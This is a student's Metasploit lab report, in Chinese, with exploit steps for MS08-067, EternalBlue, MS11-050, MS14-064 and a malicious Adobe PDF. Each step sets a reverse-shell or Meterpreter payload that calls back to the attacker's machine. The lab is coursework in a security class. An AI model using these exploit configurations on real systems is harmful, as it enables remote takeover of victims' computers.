20171113曾英特《MSF基础应用》实验报告

Posted zyt20171113

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了20171113曾英特《MSF基础应用》实验报告相关的知识,希望对你有一定的参考价值。

一、实验名称

  MSF基础应用

 

二、实验目的

  掌握Metasploit的基本应用方式,重点常用的三种攻击方式的思路。

 

三、实验内容

  1.一个主动攻击实践,如ms08_067

  2. 一个针对浏览器的攻击,如ms11_050

  3.一个针对客户端的攻击,如Adobe

  4.成功应用任何一个辅助模块

 

四、基础知识和实验准备

  1.Metasploit:是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,同时拥有6个主要模块,渗透攻击模块(Exploit Modules)、辅助模块(Auxiliary Modules)、攻击载荷(Payload Modules)、空字段模块(Nop Modules)、编码模块(Encoders)、后渗透攻击模块(Post),v5版本还拥有免杀模块(veil)。

  2.ms08-067:MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本。如果用户在受影响的系统上收到特制的RPC请求,则该漏洞可能允许远程执行代码。在Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。此漏洞可能用于进行蠕虫攻击。

  3.ms17-010: EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。SMB全称是Server Message Block(服务器信息块),用于在计算机间共享文件、打印机、串口等。

 

、实验步骤

5.1 主动攻击实践

  • 攻击者kali的IP地址为192.168.40.132win7被攻击者的IP地址为192.168.40.133win XP被攻击者IP地位为192.168.40.141
    技术图片
    技术图片

技术图片

5.1.1 ms08_067

ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限

攻击机kali,被攻击者winXP,payload:generic/shell_reverse_tcp

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

输入show targets发现该命令针对的都是win2000和xp等操作系统,而我第一次用的是2003作为靶机发现失败
技术图片

技术图片

启动后输入search ms08_067,出现了一条漏洞信息。

技术图片

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连

msf exploit(ms08_067_netapi) > set LHOST 192.168.40.132 //攻击机ip

msf exploit(ms08_067_netapi) > set LPORT 1113 //攻击端口

msf exploit(ms08_067_netapi) > set RHOST 192.168.40.141 //靶机ip,特定漏洞端口已经固定

msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高

msf exploit(ms08_067_netapi) > exploit //攻击

可以看到靶机的版本是XP
技术图片
技术图片

 技术图片

5.1.2 ms17_010_eternalblue

攻击者kali,被攻击者win7,payload:windows/x64/shell/reverse_tcp_uuid

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp_uuid

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.40.132

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 1113

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.40.133

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

发现攻击并未成功,报错了两个问题,问题提示主机不易受到攻击,暂时还没有解决这个问题

技术图片

5.2 针对浏览器的攻击

5.2.1 ms11_050

攻击机为kali,靶机为win7,payload为windows/meterpreter/reverse_https

依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.40.132 //攻击机ip

msf exploit(ms11_050_cobjectelement) > set LPORT 1113 //攻击端口固定

msf exploit(ms11_050_cobjectelement) > set URIPATH 20171113 //统一资源标识符路径设置

msf exploit(ms11_050_cobjectelement) > exploit

其中SRVPORT和SRVHOST保持原状不改变

技术图片

跳出连接后,在win7的IE上输入网址192.168.40.132:1113/20171113

回连成功

技术图片

5.2.2 ms14_064

攻击机为kali,靶机为winXP,payload为windows/meterpreter/reverse_tcp

use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块

info //查看漏洞相关信息(发现可攻击winXPwin7

技术图片

show payloads

技术图片

set payload windows/meterpreter/reverse_tcp //设置tcp反向连接

set SRVHOST 192.168.40.132 //设置攻方IP

set AllowPowerShellPrompt 1

set LHOST 192.168.40.141

set LPORT 1113

set target 0 //设置winXP靶机
技术图片

 

5.3 针对客户端的攻击

5.3.1 Adobe

进入msfconsole控制台,输入use windows/fileformat/adobe_cooltype_sing

set payload windows/meterpreter/reverse_tcp //tcp反向回连

set LHOST 192.168.40.132 //攻击机ip

set LPORT 1113 //攻击端口

set FILENAME 20171113.pdf //设置生成pdf文件的名字

exploit

技术图片

我的.msf4是隐藏目录,所以我们用命令行将其移动至桌面或者其他可见的地方

将生成的pdf文件拷贝到靶机上,需要提前下载Adobe软件进行安装。在kali上输入back退出当前模块,进入监听模块,输入以下命令:

use exploit/multi/handler set payload windows/meterpreter/reverse_tcpset LHOST 192.168.40.132set LPORT 1113

之后在靶机中双击20171113.pdf,就可以看到这边已经回连成功了

 

5.4 成功应用任何一个辅助模块

5.4.1 ipidseq

该模块将探测主机的IPID序列,并使用相同的方法对IPID空闲扫描(-SI)和0秒检测(-0)进行分类。Nmap的空闲扫描可以使用其IPID序列被分类为增量或断小端增量的主机。

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf5 > use auxiliary/scanner/ip/ipidseq

msf5 auxiliary(scanner/ip/ipidseq) > show options //查看选项

msf5 auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.3.30-192.168.3.40//目标地址范围

msf5 auxiliary(scanner/ip/ipidseq) > set TIMEOUT 5//超时设置

msf5 auxiliary(scanner/ip/ipidseq) > exploit

技术图片

技术图片

、实验要求

6.1用自己的话解释什么是exploit,payload,encode

  • exploit:这是msfconsole里面最后执行攻击的命令,它的中文意思时利用压榨,代码意思比较像运行的意思,和c语言里面的run比较相似,就是对前面的命令进行一个整体的运行并且执行攻击操作
  • payload:这是msfconsole选择设置负载时所需要使用的命令,中文意思是负载,有点像攻击者把不同的攻击方式进行相应编号,而我们通过这个编号进行选择有效的攻击,所以不同的攻击方式拥有不同的负载值
  • encode:这是编码过程中所需要使用的命令,中文意思是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码
  • 在我看来,不足的地方还有需要,比如我们操作时大部分都需要关闭防火墙和杀软才能进行拷贝文件,才能将恶意代码拷贝至目标主机,这在实战中是不现实的。
  • 对于各种攻击方式,要求都十分苛刻严格,在实战中我们面对的可能是各种各样的主机,所以这些攻击方式也显得有点落后了
  • 对靶机的版本要求特别高,不管是系统版本还是软件的版本,如何确保靶机的版本符合攻击的要求需要考虑

6.2 离实战还缺些什么技术或步骤?

、实验感想

       这是网络对抗技术的第六次实验。本次实验难点主要在靶机的版本上,由于每个攻击版本要求不同,每次攻击时都需要下不同的镜像还有软件,比较费时费力。实验中还是遇到挺多问题的,不过在老师还有同学的帮助下都一一解决了,完成了实验,也找到了和别人不一样的攻击方法,对MSF的应用更加熟练,收获颇深。因为实验毕竟是很有限的,很多东西其实是很理想化的,在现实生活中不可能奏效。每次在做实验的时候都会想要尝试一下比较“实际”的操作,比如连接到不同网段,比如能够攻击比较新的操作系统然后不被发现等等。但是现在自己的这方面能力还是比较弱,至今没有成功过。相信今后会成功的~

 

以上是关于20171113曾英特《MSF基础应用》实验报告的主要内容,如果未能解决你的问题,请参考以下文章

20171113曾英特《Web基础》实验报告

20171113曾英特《Web基础》实验报告

20171113曾英特《逆向及Bof基础实践》实验报告

20171121王朋伟《MSF基础应用》实验报告

20155201 网络攻防技术 实验五 MSF基础应用

《网络对抗技术》Exp6 MSF基础应用